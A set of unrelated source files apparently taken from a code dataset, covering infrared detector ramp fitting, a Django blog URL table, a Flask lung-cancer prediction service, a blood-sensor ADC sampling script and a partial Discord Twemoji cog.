    for i in range(len(missing)):
        print(missing[i])
    print('')
    print('... you way also have given some erroneous input, double check your inputs dude!')
    sys.exit()
# Fewer than 3 argv entries means no output name plus input file(s) were
# given: print the usage message and exit.
if len(sys.argv) <=2:
    print('***** !!! warning, something went wrong !!! *****')
    print('')
    print(' ----- you can provide a list of files as an input -----')
    print('')
    print('syntax : python fits2ramp.py outname directory/file*.fits -cube -noerror -linearize')
    print('')
    print('')
    print(' the argument after the "outname" must be the files to combine')
    print(' with the ramp-fitting algorithm. ex: 20170322140210/H2RG_R01_M01_N08*.fits ')
    print(' should also accept *.fits.gz files')
    print(' you need at least two files in the wildcard. You can also expliclty')
    print(' name the files you combine.')
    print(' The syntax would be :')
    print(' python fits2ramp.py outname file1.fits file2.fits ... fileN.fits')
    print('')
    print(' ----- you can also provide a single file that has a MEF format -----')
    print('')
    print('syntax : python fits2ramp.py outname mef_file*.fits -cube -noerror -linearize')
    print('')
    print(' if you provide an outname and a single fits file, then we know its a MEF')
    print('')
    print(' if you provide a -n=XXXX then only the first XXXX readouts within the MEF')
    print('')
    print(' will be used for slope fitting')
    print(' ---- some more options ----' )
    print('')
    print(' -cube saves all slices in a cube. This is slower and takes disk space')
    print(' -noerror does not compute the slope error. This is faster.' )
    print(' -linearize corrects for non-linearity. This is slower but more accurate.')
    print('')
    print(' If all goes well, the programs outputs 2 files: ')
    print(' outnameo.fits ')
    print(' ... ext=1, ramp frame' )
    print(' ... ext=2, ramp intercept')
    print(' ... ext=3, ramp error' )
    print(' ... ext=4, ramp # valid frames')
    print(' ... every where, NaN values trace saturated pixel')
    print(' outnamer.fits.gz')
    print(' ... cube with as many slices as there are files in the wildcard above')
    print(' ... outnamer.fits.gz contains the same info as the files' )
    print(' ... this is only done if we pass the "-cube" argument')
    print('')
    sys.exit()
#################################################################
#################################################################
# We need the size of the image. Should be 2048 or 4096 (H2RG/H4RG)
imdim=(np.shape(pyfits.getdata(fic[0])))[1]
if (imdim!=2048) and (imdim!=4096):
    print('')
    print('')
    print(' something is really wrong with the size of the input image')
    print(' the image '+fic[0]+' has a width of :',imdim,' pixel(s)')
    print(' and we should only have values of 2048 or 4096 pixels')
    print('')
    print('')
    sys.exit()
# reading the relevant calibrations
#mask = getdata(calibdir+'/mask.fits') # 0/1 mask defining the area of the science array used as pose-meter
mask=np.zeros([imdim,imdim],dtype=float) # dummy ~~~>>> will need to be changed for the H4RG
# this is the region used for the posemeter
# For SPIRou, we will have a binary mask selecting the H-band orders (science and not ref channel)
# NOTE(review): the pixel box below is hard-coded; it presumably targets a
# 2048x2048 H2RG and would land in the wrong place on a 4096x4096 H4RG.
mask[1912:1938,572:777]=1
mask=np.where(mask ==1)
# non-linearity cube with 4 slices. The linearized flux will be derived from the measured flux with the
# following relation :
# F_lin = a0 + a1*(F_mea - bias) + a2*(F_mea - bias)**2 + a3*(F_mea - bias)**3
# where aN is the Nth slice of the linearity cube
# ... bias is the super-bias
# ... F_lin is the linearised flux
# ... F_mea is the measured flux
#linearity = getdata(calibdir+'/non_lin.fits') # we will use files with non-linearity correction here
# This is an operation that may be done if we do not have a bias in hand and want to
# correct non-linearity. Lets consider this under development and set it to False for now
#
linearity_saturation = pyfits.getdata('nonlin.fits')
# Slice 1 - 2nd order term of non-linearity correction
# Slice 2 - 3rd order term of non-linearity correction
linearity = linearity_saturation[0:2,:,:]
# Slice 3 - dynamical range for <20% non-linearity
saturation = linearity_saturation[2,:,:]
# Determine dim3, the number of readouts to fit, for the three input modes:
# a list of individual files (one readout per file), a single MEF (one
# readout per extension) or a single cube (one readout per slice). In each
# mode, honour a user-requested -n=XXX only if enough readouts exist.
if mef_flag==0 and cubefits_flag==0:
    if nmax_set == False:
        dim3 = len(fic)
    else:
        if len(fic) < dim3:
            print('You requested a ramp of ',dim3,' readouts... ')
            print(' ... but you have only ',len(fic),' files')
            sys.exit()
if mef_flag==1:
    hdulist = pyfits.open(fic[0],memmap=False) ## We will use memmap when CFHT gets rid of BZERO/BSCALE/BLANK header keywords
    dims=np.shape(hdulist[1])
    if nmax_set == False:
        dim3= len(hdulist)-1
    else:
        if (len(hdulist)-1) < dim3:
            print('You requested a ramp of ',dim3,' readouts... ')
            print(' ... but you have only ',len(hdulist)-1,' slices in your MEF')
            sys.exit()
if cubefits_flag==1:
    if nmax_set == False:
        dim3 = h['naxis3']
    else:
        if (h['naxis3']) < dim3:
            print('You requested a ramp of ',dim3,' readouts... ')
            # bug fix: this message used len(hdulist)-1, but hdulist is only
            # defined in the MEF branch -> NameError for cube inputs; the
            # slice count for a cube is NAXIS3
            print(' ... but you have only ',h['naxis3'],' slices in your cube')
            sys.exit()
# delete all keywords from the reference file
del_keywords=['DATLEVEL', 'ASICGAIN', 'NOMGAIN', 'AMPRESET', 'KTCREMOV', 'SRCCUR',\
              'AMPINPUT', 'V4V3V2V1', 'PDDECTOR', 'CLKOFF', 'NADCS', 'INTTIME',\
              'TSTATION', 'SEQNUM_N', 'SEQNUM_M', 'CLOCKING', 'NEXTRAP','NEXTRAL', 'SEQNNAME']
for key in del_keywords:
    if key in h: # as keywords may change from version to version, we check if the keyword we want to delete is present
        del h[key]
del h['bias*']
timestamp=np.zeros(dim3,dtype=float)
# loop to populate the per-readout timestamps (seconds since reset)
for i in range(dim3):
    if mef_flag==0 and cubefits_flag==0: # one file per readout; timing comes from each file's header
        h_tmp = pyfits.getheader(fic[i])
        # NOTE(review): the FITS card comments below look swapped (frmtime is
        # labelled "integration time" and inttime "frame time") -- confirm
        # against the instrument's header convention.
        if 'frmtime' not in h_tmp:
            h_tmp['frmtime'] = 5.24288, 'assumed integration time (s)'
        if 'inttime' not in h_tmp:
            h_tmp['inttime'] = 5.24288*(i+1), 'assumed frame time (s)'
        timestamp[i]=h_tmp['inttime']
    if cubefits_flag==1: # we have a cube, calculate from FRMTIME
        timestamp[i]= (i+1)*h['frmtime'] # sets zero time at the time of reset
    if mef_flag==1: # we read the ith extension
        h_tmp = hdulist[i+1].header
        timestamp[i]=h_tmp['inttime']
if mef_flag==0 and cubefits_flag==0:
    order = np.argsort(timestamp) # who knows, the files may not be in the right order! Lets sort them according to their timestamps
    fic=fic[order]
    timestamp=timestamp[order]
# write one INTTnnnn header card per readout with its timestamp
for i in range(dim3):
    tag0 = str(i+1)
    if len(tag0) < 4:
        tag = '0'*(4-len(tag0))+tag0
    # NOTE(review): if i+1 ever reaches 4 digits (dim3 >= 1000), "tag" keeps
    # the padded value from the previous iteration -- tag0.zfill(4) would be
    # safer here.
    tag = 'INTT'+tag
    h[tag] = (timestamp[i],'Timestamp, '+tag0+'/'+str(dim3))
if mef_flag==1:
    write_cube=False # the -cube option is disabled for MEF inputs
if write_cube:
    # Optional raw-readout cube output (the -cube flag). Bug fix: this used
    # to allocate np.zeros([dim3,dim2,dim1]) but dim1/dim2 are never defined
    # anywhere in the script (NameError) -- the frames are imdim x imdim.
    cube=np.zeros([dim3,imdim,imdim],dtype=float)
    print('loading all files in cube')
    for i in range(dim3):
        print(i+1,'/',len(fic),fic[i])
        im=pyfits.getdata(fic[i])
        cube[i,:,:] = im
    print('writing the cube file --> '+odometer+'r.fits ')
    t1 = time.time()
    hcube=h2 # NOTE(review): alias, not a copy -- the NAXIS edits below also affect h2
    hcube['NAXIS'] = 3
    hcube['NAXIS3'] = dim3
    pyfits.writeto(odometer+'r.fits', cube,header=hcube)
    # This operation is somewhat long and could lead to back-log of files on a slow machine
    # ... for the code development, we time it. This may be removed at a later point.
    print('Duration of file writting : '+str(float(time.time()-t1))+' s')
    # zipping the .fits file. Normally this could be done within pyfits.writeto, but its much, much slower
    os.system('gzip -f '+odometer+'r.fits &')
    print('done writing the cube file --> '+odometer+'r.fits')
    print(' compressing file in background ... ')
    del cube # removing cube from memory to make things lighter
else:
    print('we do not write the cube file for this ramp')
# placeholders for some arithmetics for the linear fit
#sx = 0#np.zeros([dim2,dim1])
#sx2 = 0#np.zeros([dim2,dim1])
sy = np.zeros([imdim,imdim],dtype=float) # per-pixel sum of fluxes over valid readouts
n = np.zeros([imdim,imdim],dtype=np.int16) # per-pixel count of valid (unsaturated) readouts
sxy = np.zeros([imdim,imdim],dtype=float) # per-pixel sum of flux*time
fmask = np.zeros(dim3,dtype=float) # posemeter flux, one value per readout
# mask for pixels that are valid
goodmask = np.full((imdim,imdim),True,dtype=bool)
# when a pixels goes above saturation, it remains invalid for the rest of the ramp
if skip_error == False:
    savname=['']*dim3 # temporary .npz filenames, one per readout, for the error pass
print(mef_flag,cubefits_flag,linearize)
t_start=time.time()
# Main readout loop: accumulate, one readout at a time, the per-pixel sums
# (n, sy, sxy) needed for the linear fit of flux versus time, so that only
# one full frame is in memory at once (except for the cube-input mode).
for i in range(dim3):
    t0=time.time()
    print(i+1,'/',dim3,' ~~~> Computing slope')
    if mef_flag==0 and cubefits_flag==0: # this is a set with N files
        im = pyfits.getdata(fic[i])
    if mef_flag==1:
        im=hdulist[i+1].data # reading the Nth extension
    if cubefits_flag==1:
        if i ==0:
            bigcube=pyfits.getdata(fic[0]) # that's dangerous as it may overfill memory
        im=bigcube[i,:,:]
    im = np.array(im,dtype='float')
    if selfbias and (i ==0):
        bias = np.array(im)
        print('setting 1st extension as a bias file')
        dobias=True
    # pixels above their per-pixel saturation limit become invalid and stay
    # invalid for the remainder of the ramp (goodmask is only ever ANDed)
    goodmask = (im <= saturation)*goodmask
    if dobias:
        if selfbias:
            print('bias subtraction with 1st readout')
        else:
            print('bias subtraction with provided bias file')
        im-=bias
    if linearize:
        print('applying non-lin correction')
        # first we linearize the data by applying the non-linearity coefficients and bias correction
        for j in range(2):
            im += linearity[j,:,:]*(im)**(j+2)
    if selfbias and (skip_ref == False):
        print('as we applied self-bias, we correct ref pixels')
        im=refpixcorr(im)
    n+= goodmask
    fmask[i]=np.nanmean( im[mask]) # posemeter: mean flux over the mask region
    # m*=goodmask # starting now, only the product of the two is needed. saves one multipltication
    # Actually, best not fill what used to be saturated elements in the array with
    # 0, which is what this did. Then, if the errslope calculation wants to check
    # im <= saturation as it used to do, it will come up with the wrong answer.
    # Since the first check for im <= saturation (about 20 lines above) does so
    # before linearity correction and this check would be after, they could also
    # come up with different answers though, unless the linearity function is
    # is guaranteed to apply a correction that keeps saturation values at the same
    # ADU. Since we already have n[], when the errslope calculation happens, it
    # uses that, now with a simple "goodmask = (n > i)" for each i on that pass.
    sy[goodmask]+= im[goodmask]#*goodmask
    sxy[goodmask]+=(im[goodmask]*timestamp[i])
    # here we save the non-linearity corrected images as python npz files
    # we could just dump everything into a big cube to be used in the slope
    # error determination. We opt to write these files to disk to avoid overfilling
    # the memory. This should be safer for very large number of reads.
    #
    # We cannot simply re-read the fits files are the "im" variable saved in the npz has been corrected for
    # non-linearity, which is NOT the case for the .fits.gz. We save the NPZ only if the data is linearized
    #
    # We also corrected for the bias regions of the detector, so a temporary file is necessary if we want to properly compute slope error
    # and cannot afford to keep everything in memory. Keeping everything in memory may be fine for small datasets, but we want
    # to avoid having a code that crashes for long sequences or on machines with less memory!
    if skip_error == False:
        savname[i]='.tmp'+str(i)+'.npz'
        np.savez(savname[i],im=im) # this file is temporary and will be deleted after computing the slope error
    dt=(time.time()-t_start)/(i+1.0)
    print('dt[last image] ','{:5.2f}'.format(time.time()-t0),'s; dt[mean/image] ','{:5.2f}'.format(dt),'s; estimated time left '+'{:3.0f}'.format(np.floor((dim3-i)*dt/60))+'m'+'{:2.0f}'.format(np.floor((dim3-i)*dt % 60))+'s')
# we now have these variables outside the loop. We keep n that contains the
# number of valid reads, and directely interpolate the vector with the cumulative
# sum of timestamp and timestamp**2. Previously, we added these values to the sx and sx2
# matrices for each frame. This operation is much, much faster and equivalent.
sx=np.where(n>0,(np.cumsum(timestamp))[n-1],0)
sx2=np.where(n>0,(np.cumsum(timestamp**2))[n-1],0)
if mef_flag==1:
    hdulist.close()
fmask-=fmask[0] # posemeter flux measured relative to the first readout
# write one POSEnnnn header card per readout with the posemeter value
for i in range(dim3):
    tag0 = str(i+1)
    # bug fix: the padding used to be computed as '0'*(4-len(tag)) with the
    # *previous* iteration's tag (and tag was never rebuilt once i+1 reached
    # 4 digits); zfill pads the readout number correctly in every case.
    # The card comment now also reports dim3 (the number of readouts) for
    # consistency with the INTT cards -- len(fic) is 1 for MEF/cube inputs.
    tag = 'POSE'+tag0.zfill(4)
    h[tag] = (fmask[i],'Posemeter, '+tag0+'/'+str(dim3))
a = np.zeros([imdim,imdim],dtype=float)+np.nan # slope, NaN if not enough valid readouts
b = np.zeros([imdim,imdim],dtype=float)+np.nan # intercept
valid=n>1 # only valid where there's more than one good readout(s)
b[valid] = (sx*sxy-sx2*sy)[valid]/(sx**2-n*sx2)[valid] # algebra of the linear fit
a[valid] = (sy-n*b)[valid]/sx[valid]
# For the sake of consistency, we fix the slope, error and intercept to NaN for
# pixels that have 0 or 1 valid (i.e., not saturated) values and for which
# one cannot determine a valid slope
errslope = np.zeros([imdim,imdim],dtype=float)+np.nan
goodmask = np.full((imdim,imdim),True,dtype=bool)
if skip_error == False:
    varx2 = np.zeros([imdim,imdim],dtype=float)
    vary2 = np.zeros([imdim,imdim],dtype=float)
    xp = np.zeros([imdim,imdim],dtype=float)
    valid = (n>2) # the error formula divides by n-2, so at least 3 readouts are needed
    xp[valid]=sx[valid]/n[valid] # used in the determination of error below
    print('we now compute the standard error on the slope')
    for i in range(dim3):
        # we read the npz as this file has been linearized (if the -linearize keyword has been set)
        # and we subtracted the reference regions on the array
        data=np.load(savname[i])
        # NOTE(review): the temp file is removed *before* data['im'] is read;
        # np.load is lazy, so this relies on the OS keeping the open file
        # alive after unlink -- confirm if this ever needs to run on Windows.
        os.system('rm '+savname[i])
        im=data['im']
        goodmask = (n > i) # pixels that were still unsaturated at readout i
        yp = b+a*timestamp[i] # fitted model evaluated at this readout's time
        print(i+1,'/',dim3,' ~~~> Computing slope error')
        varx2+= ((timestamp[i]-xp)**2)*goodmask # we multiply by goodmask so that only
        vary2+= ((im-yp)**2)*goodmask
    valid*=(varx2!=0) # avoid diving by zero
    errslope[valid] = np.sqrt(vary2[valid]/(n[valid]-2))/np.sqrt(varx2[valid])
    # deleting the temporary npz
else:
    print(' We do not calculate the error on slope.')
    print(' This is faster and intended for debugging but ')
    print(' ultimately we will want to compute slope error ')
    print(' for all files')
h['satur1']=(nanmedian(saturation),'median saturation limit in ADU')
h['satur2']=(nanmedian(saturation)/max(timestamp),'median saturation limit in ADU/s')
dfmask = fmask[1:]-fmask[0:-1] # flux received between readouts
dtimestamp = timestamp[1:]+0.5*(timestamp[-1]-timestamp[0])/(len(timestamp)-1) # mid-time of Nth readout
### we estimate the RON by checking the slope error in pixels receiving little flux
### as the orders cover ~50% of the science array, we take the median slope error of
### pixels that are below the median slope. We assume that these pixels have an RMS that is
### dominated by readout noise (TO BE CONFIRMED).
### we also clip pixels that are above 3x the median RMS
pseudodark = 0.0 # (a < np.median(a))*(errslope < 3*np.median(errslope))
ron_estimate = 0.0 #np.median(errslope[pseudodark])*(max(timestamp)-min(timestamp)) # converted into ADU instead of ADU/s
#### Standard FITS Keywords BITPIX = 16 / 16bit
h['BSCALE']=(1.0 , 'Scale factor')
#### FITS keyword related to the detector
h['RON_EST']=(ron_estimate , '[ADU] read noise estimate')
# NOTE(review): NSUBEXPS is len(fic), which is 1 for MEF/cube inputs --
# dim3 would report the actual number of readouts; confirm intent.
h['NSUBEXPS']=(len(fic) , 'Total number of sub-exposures of 5.5s ')
#h['TMID']= (np.sum(dtimestamp*dfmask)/np.sum(dfmask) , '[s] Flux-weighted mid-exposure time ' )
#h['CMEAN']= ( np.mean(dfmask)/(timestamp[1]-timestamp[0]), '[ADU/s] Average count posemeter' )
if skip_ref == False:
    a=refpixcorr(a,oddeven=True)
a=np.float32(a) # 32-bit output is plenty for the slope data and halves disk use
if dobias:
    # we subtracted the bias from all frames, we need to add it to the intercept
    b+=bias
b=np.float32(b)
errslope=np.float32(errslope)
# assemble the 4-extension output MEF: slope, intercept, slope error, count
hdu1 = pyfits.PrimaryHDU()
hdu1.header = h
hdu1.header['NEXTEND'] = 4
hdu2 = pyfits.ImageHDU(a)
hdu2.header['UNITS'] = ('ADU/S','Slope of fit, flux vs time')
hdu2.header['EXTNAME'] = ('slope','Slope of fit, flux vs time')
hdu3 = pyfits.ImageHDU(b)
hdu3.header['UNITS'] = ('ADU','Intercept of the pixel/time fit.')
hdu3.header['EXTNAME'] = ('intercept','Intercept of the pixel/time fit.')
hdu4 = pyfits.ImageHDU(errslope)
hdu4.header['UNITS'] = ('ADU/S','Formal error on slope fit')
hdu4.header['EXTNAME'] = ('errslope','Formal error on slope fit')
hdu5 = pyfits.ImageHDU(n)
hdu5.header['UNITS'] = ('Nimages','N readouts below saturation')
hdu5.header['EXTNAME'] = ('count','N readouts below saturation')
new_hdul = pyfits.HDUList([hdu1, hdu2, hdu3, hdu4, hdu5])
# just to avoid an error message with writeto
if os.path.isfile(odometer+'.fits'):
    print('file : '+odometer+'.fits exists, we are overwriting it')
    os.system('rm '+odometer+'.fits')
# 'clobber' was deprecated (astropy 1.3) and later removed; 'overwrite' is
# the supported keyword (the file was already removed just above anyway)
new_hdul.writeto(odometer +'.fits', overwrite=True)
# bug fix: t0 is the per-readout timer from the last loop iteration; the
# total runtime must be measured from t_start
print('Elapsed time for entire fits2ramp : '+str(float(time.time()-t_start))+' s')
| 40.20411 | 225 | 0.665474 |
c90f386866b7264c9826cea39ffcc2b6fd5aaf00 | 394 | py | Python | blog/urls.py | encukou/Zpetnovazebnik | 0d058fd67049a3d42814b04486bde93bc406fa3b | [
"MIT"
] | 1 | 2019-12-04T10:10:53.000Z | 2019-12-04T10:10:53.000Z | blog/urls.py | encukou/Zpetnovazebnik | 0d058fd67049a3d42814b04486bde93bc406fa3b | [
"MIT"
] | 14 | 2019-04-07T07:46:07.000Z | 2022-03-11T23:44:31.000Z | blog/urls.py | encukou/Zpetnovazebnik | 0d058fd67049a3d42814b04486bde93bc406fa3b | [
"MIT"
] | 1 | 2019-02-16T09:25:51.000Z | 2019-02-16T09:25:51.000Z | from django.urls import path
from . import views
# Route table for the course/session blog views. Course and session slugs
# identify the objects; the final route gates comment posting behind a
# password segment embedded in the URL.
urlpatterns = [
    path('', views.course_list, name='course_list'),
    path('<course_slug>/', views.session_list, name='session_list'),
    path('<course_slug>/<session_slug>/', views.session_detail, name='session_detail'),
    path('<course_slug>/<session_slug>/<password>/', views.add_comment_to_session, name='add_comment_to_session'),
]
| 35.818182 | 114 | 0.72335 |
c912b5b1a08a02d640553311c19b5c840ef97729 | 4,651 | py | Python | web_app/api_service.py | shayan-taheri/sql_python_deep_learning | ceb2c41bcb1fed193080f64ba4da018d76166222 | [
"MIT"
] | 23 | 2017-11-29T17:33:30.000Z | 2021-10-15T14:51:12.000Z | web_app/api_service.py | shayan-taheri/sql_python_deep_learning | ceb2c41bcb1fed193080f64ba4da018d76166222 | [
"MIT"
] | 1 | 2017-10-12T11:23:08.000Z | 2017-10-12T11:23:08.000Z | web_app/api_service.py | isabella232/sql_python_deep_learning | ceb2c41bcb1fed193080f64ba4da018d76166222 | [
"MIT"
] | 16 | 2017-12-21T08:55:09.000Z | 2021-03-21T20:17:40.000Z | from api import app, BAD_PARAM, STATUS_OK, BAD_REQUEST
from flask import request, jsonify, abort, make_response,render_template, json
import sys
from lung_cancer.connection_settings import get_connection_string, TABLE_SCAN_IMAGES, TABLE_GIF, TABLE_MODEL, TABLE_FEATURES, LIGHTGBM_MODEL_NAME, DATABASE_NAME,NUMBER_PATIENTS
from lung_cancer.lung_cancer_utils import get_patients_id, get_patient_id_from_index, select_entry_where_column_equals_value, get_features, get_lightgbm_model, prediction
import pyodbc
import cherrypy
from paste.translogger import TransLogger
def run_server():
    """Host the Flask app under a CherryPy WSGI server on port 5000.

    Blocks until the CherryPy engine stops.
    """
    # Enable WSGI access logging via Paste
    wrapped_app = TransLogger(app)
    # Mount the WSGI callable object (app) on the root directory
    cherrypy.tree.graft(wrapped_app, '/')
    # Set the configuration of the web server
    server_config = {
        'engine.autoreload_on': True,
        'log.screen': True,
        'log.error_file': "cherrypy.log",
        'server.socket_port': 5000,
        'server.socket_host': '0.0.0.0',
        'server.thread_pool': 50,  # 10 is default
    }
    cherrypy.config.update(server_config)
    # Start the CherryPy WSGI web server
    cherrypy.engine.start()
    cherrypy.engine.block()
# Connection: module-level database connection and cursor, shared by every
# request handler below.
# NOTE(review): a single pyodbc cursor shared across web-server worker
# threads is presumably not thread-safe -- confirm the deployment model.
connection_string = get_connection_string()
conn = pyodbc.connect(connection_string)
cur = conn.cursor()
# Model: LightGBM model loaded once at import time from the database
model = get_lightgbm_model(TABLE_MODEL, cur, LIGHTGBM_MODEL_NAME)
# Functions
@app.route("/")
def index():
cherrypy.log("CHERRYPY LOG: /")
return render_template('index.html')
@app.route('/gif/<patient_index>')
def patient_gif(patient_index):
    """Return a JSON payload with the GIF URL for the given patient index."""
    patient_index = int(patient_index)
    # NOTE(review): only the upper bound is validated; zero/negative indices
    # fall through to manage_gif -- confirm whether that is acceptable
    if patient_index > NUMBER_PATIENTS:
        abort(BAD_REQUEST)
    cherrypy.log("CHERRYPY LOG: /gif/<patient_index>")
    gif_url = manage_gif(patient_index)
    return make_response(jsonify({'status': STATUS_OK, 'gif_url': gif_url}), STATUS_OK)
@app.route('/predict/<patient_index>')
def predict_patient(patient_index):
    """Return a JSON payload with the cancer probability (percent) for the patient."""
    patient_index = int(patient_index)
    if patient_index > NUMBER_PATIENTS:
        abort(BAD_REQUEST)
    cherrypy.log("CHERRYPY LOG: /predict/<patient_index>")
    prob = manage_prediction(patient_index)
    return make_response(jsonify({'status': STATUS_OK, 'prob': prob}), STATUS_OK)
@app.route('/patient_info', methods=['POST'])
def patient_info():
    """Render the patient page (with GIF) for the form-submitted patient."""
    cherrypy.log("CHERRYPY LOG: /patient_info")
    patient_index = manage_request_patient_index(request.form['patient_index'])
    gif_url = manage_gif(patient_index)
    return render_template('patient.html', patient_index=patient_index, gif_url=gif_url)
@app.route('/patient_prob', methods=['POST'])
def patient_prob():
    """Render the patient page with the SQL-stored-procedure prediction."""
    cherrypy.log("CHERRYPY LOG: /patient_prob")
    patient_index = manage_request_patient_index(request.form['patient_index'])
    prob = manage_prediction_store_procedure(patient_index)
    gif_url = manage_gif(patient_index)
    return render_template('patient.html', patient_index=patient_index, prob=round(prob,2), gif_url=gif_url)
def is_integer(s):
    """Return True when *s* parses as a base-10 integer, False otherwise."""
    try:
        int(s)
    except ValueError:
        return False
    return True
def manage_request_patient_index(patient_request):
    """Map free-text form input to a usable patient index.

    Known demo patients (matched by name substring) map to fixed indices;
    numeric input is clamped to the valid range; anything else falls back
    to patient 7.
    """
    request_lower = patient_request.lower()
    # Note the direction of the substring test: the *input* must be
    # contained in the known demo name.
    if request_lower in "anthony embleton":
        return 1
    if request_lower in "ana fernandez":
        return 175
    if not is_integer(patient_request):
        return 7  # fallback demo patient for unparseable input
    patient_index = int(patient_request)
    if patient_index > NUMBER_PATIENTS:
        patient_index = NUMBER_PATIENTS - 1
    return patient_index
def manage_gif(patient_index):
    """Look up the GIF URL stored in the database for a patient index."""
    patient_id = get_patient_id_from_index(TABLE_SCAN_IMAGES, cur, patient_index)
    print(patient_id)
    resp = select_entry_where_column_equals_value(TABLE_GIF, cur, 'patient_id', patient_id)
    # NOTE(review): resp[1] assumes the URL is the second column of the
    # returned row -- confirm against the TABLE_GIF schema
    gif_url = resp[1]
    print("gif_url: ",gif_url)
    return gif_url
def manage_prediction(patient_index):
    """Run the in-process LightGBM model and return the probability in percent."""
    patient_id = get_patient_id_from_index(TABLE_SCAN_IMAGES, cur, patient_index)
    feats = get_features(TABLE_FEATURES, cur, patient_id)
    probability_cancer = prediction(model, feats)
    # scale the [0, 1] probability to a percentage for display
    prob = float(probability_cancer)*100
    return prob
def manage_prediction_store_procedure(patient_index):
    """Run the in-database PredictLungCancer stored procedure and return its result."""
    # NOTE(review): DATABASE_NAME and LIGHTGBM_MODEL_NAME are concatenated
    # directly into the T-SQL text. They are configuration constants here,
    # but if they ever become user-controlled this must be parameterized.
    query = "DECLARE @PredictionResultSP FLOAT;"
    query += "EXECUTE " + DATABASE_NAME + ".dbo.PredictLungCancer @PatientIndex = ?, @ModelName = " + \
             LIGHTGBM_MODEL_NAME + ", @PredictionResult = @PredictionResultSP;"
    cur.execute(query, patient_index)
    prob = cur.fetchone()[0]
    return prob
if __name__ == "__main__":
run_server()
conn.close() | 33.221429 | 176 | 0.723285 |
c9144a2b1a0cbf40a3d765da71a5f9435588a292 | 335 | py | Python | 10-blood/scripts/bloodMeasure.py | antl-mipt-ru/get | c914bd16131639e1af4452ae7351f2554ef83ce9 | [
"MIT"
] | null | null | null | 10-blood/scripts/bloodMeasure.py | antl-mipt-ru/get | c914bd16131639e1af4452ae7351f2554ef83ce9 | [
"MIT"
] | null | null | null | 10-blood/scripts/bloodMeasure.py | antl-mipt-ru/get | c914bd16131639e1af4452ae7351f2554ef83ce9 | [
"MIT"
] | 1 | 2021-10-11T16:24:32.000Z | 2021-10-11T16:24:32.000Z | import bloodFunctions as blood
import time
try:
    # sample the SPI ADC as fast as possible for 60 seconds, then persist
    samples = []
    blood.initSpiAdc()
    start = time.time()
    while (time.time() - start) < 60:
        samples.append(blood.getAdc())
    finish = time.time()
    blood.deinitSpiAdc()
    blood.save(samples, start, finish)
finally:
    # NOTE(review): if sampling raises, deinitSpiAdc() and save() are never
    # called -- consider moving the ADC cleanup into this finally block
    print("Blood measure script finished")
c915f05bb0ce24d1fe5469fea260ce3e99ceb13c | 5,144 | py | Python | bot/exts/utilities/twemoji.py | thatbirdguythatuknownot/sir-lancebot | 7fd74af261385bdf7d989f459bec4c9b0cb4392a | [
"MIT"
] | 77 | 2018-11-19T18:38:50.000Z | 2020-11-16T22:49:59.000Z | bot/exts/utilities/twemoji.py | thatbirdguythatuknownot/sir-lancebot | 7fd74af261385bdf7d989f459bec4c9b0cb4392a | [
"MIT"
] | 373 | 2018-11-17T16:06:06.000Z | 2020-11-20T22:55:03.000Z | bot/exts/utilities/twemoji.py | thatbirdguythatuknownot/sir-lancebot | 7fd74af261385bdf7d989f459bec4c9b0cb4392a | [
"MIT"
] | 165 | 2018-11-19T04:04:44.000Z | 2020-11-18T17:53:28.000Z | import logging
import re
from typing import Literal, Optional
import discord
from discord.ext import commands
from emoji import UNICODE_EMOJI_ENGLISH, is_emoji
from bot.bot import Bot
from bot.constants import Colours, Roles
from bot.utils.decorators import whitelist_override
from bot.utils.extensions import invoke_help_command
log = logging.getLogger(__name__)
# Raw GitHub URLs for Twitter's Twemoji source assets, keyed by file format.
BASE_URLS = {
    "png": "https://raw.githubusercontent.com/twitter/twemoji/master/assets/72x72/",
    "svg": "https://raw.githubusercontent.com/twitter/twemoji/master/assets/svg/",
}
# Matches a 4-6 character lowercase hex codepoint at the end of a string.
# NOTE(review): the first character class excludes '0', so codepoints with a
# leading zero (e.g. "0023" for '#') never match -- confirm intentional.
CODEPOINT_REGEX = re.compile(r"[a-f1-9][a-f0-9]{3,5}$")
class Twemoji(commands.Cog):
"""Utilities for working with Twemojis."""
def __init__(self, bot: Bot):
self.bot = bot
@staticmethod
def get_url(codepoint: str, format: Literal["png", "svg"]) -> str:
"""Returns a source file URL for the specified Twemoji, in the corresponding format."""
return f"{BASE_URLS[format]}{codepoint}.{format}"
@staticmethod
def alias_to_name(alias: str) -> str:
"""
Transform a unicode alias to an emoji name.
Example usages:
>>> alias_to_name(":falling_leaf:")
"Falling leaf"
>>> alias_to_name(":family_man_girl_boy:")
"Family man girl boy"
"""
name = alias.strip(":").replace("_", " ")
return name.capitalize()
@staticmethod
def build_embed(codepoint: str) -> discord.Embed:
"""Returns the main embed for the `twemoji` commmand."""
emoji = "".join(Twemoji.emoji(e) or "" for e in codepoint.split("-"))
embed = discord.Embed(
title=Twemoji.alias_to_name(UNICODE_EMOJI_ENGLISH[emoji]),
description=f"{codepoint.replace('-', ' ')}\n[Download svg]({Twemoji.get_url(codepoint, 'svg')})",
colour=Colours.twitter_blue,
)
embed.set_thumbnail(url=Twemoji.get_url(codepoint, "png"))
return embed
@staticmethod
def emoji(codepoint: Optional[str]) -> Optional[str]:
"""
Returns the emoji corresponding to a given `codepoint`, or `None` if no emoji was found.
The return value is an emoji character, such as "🍂". The `codepoint`
argument can be of any format, since it will be trimmed automatically.
"""
if code := Twemoji.trim_code(codepoint):
return chr(int(code, 16))
@staticmethod
def codepoint(emoji: Optional[str]) -> Optional[str]:
"""
Returns the codepoint, in a trimmed format, of a single emoji.
`emoji` should be an emoji character, such as "🐍" and "🥰", and
not a codepoint like "1f1f8". When working with combined emojis,
such as "🇸🇪" and "👨👩👦", send the component emojis through the method
one at a time.
"""
if emoji is None:
return None
return hex(ord(emoji)).removeprefix("0x")
@staticmethod
def trim_code(codepoint: Optional[str]) -> Optional[str]:
"""
Returns the meaningful information from the given `codepoint`.
If no codepoint is found, `None` is returned.
Example usages:
>>> trim_code("U+1f1f8")
"1f1f8"
>>> trim_code("\u0001f1f8")
"1f1f8"
>>> trim_code("1f466")
"1f466"
"""
if code := CODEPOINT_REGEX.search(codepoint or ""):
return code.group()
    @staticmethod
    def codepoint_from_input(raw_emoji: tuple[str, ...]) -> str:
        """
        Returns the codepoint corresponding to the passed tuple, separated by "-".
        The return format matches the format used in URLs for Twemoji source files.
        Example usages:
        >>> codepoint_from_input(("🐍",))
        "1f40d"
        >>> codepoint_from_input(("1f1f8", "1f1ea"))
        "1f1f8-1f1ea"
        >>> codepoint_from_input(("👨👧👦",))
        "1f468-200d-1f467-200d-1f466"
        """
        # NOTE(review): assumes raw_emoji is non-empty — the command handler
